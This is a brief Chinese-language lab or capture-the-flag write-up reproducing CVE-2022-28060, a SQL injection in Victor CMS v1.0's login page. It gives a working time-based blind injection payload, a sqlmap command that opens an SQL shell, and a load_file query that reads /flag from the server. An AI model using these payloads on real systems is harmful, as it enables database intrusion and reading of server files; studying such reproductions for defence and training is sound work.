幽离知识库

Appearance

On this page

CVE-2022-28060漏洞复现

Victor CMS v1.0 /includes/login.php 存在sql注入 打开页面发现有个登录页面,随便输入账号密码,发现进入/includes/login.php页面,于是我们截一下包,然后测试盲注: 1'+AND+(SELECT*FROM+(SELECT+SLEEP(5))a)+AND+'1'=' 发现可以进行盲注猜字,于是我们拉进sqlmap: sqlmap -r /home/kali/桌面/login.txt --sql-shell -v --batch

在sql-shell启动后,读取/flag的内容: sql-shell> select load_file('/flag')

接下来耐心等待一会儿即可!

Released under the MIT License.

Copyright © 2023-present youLi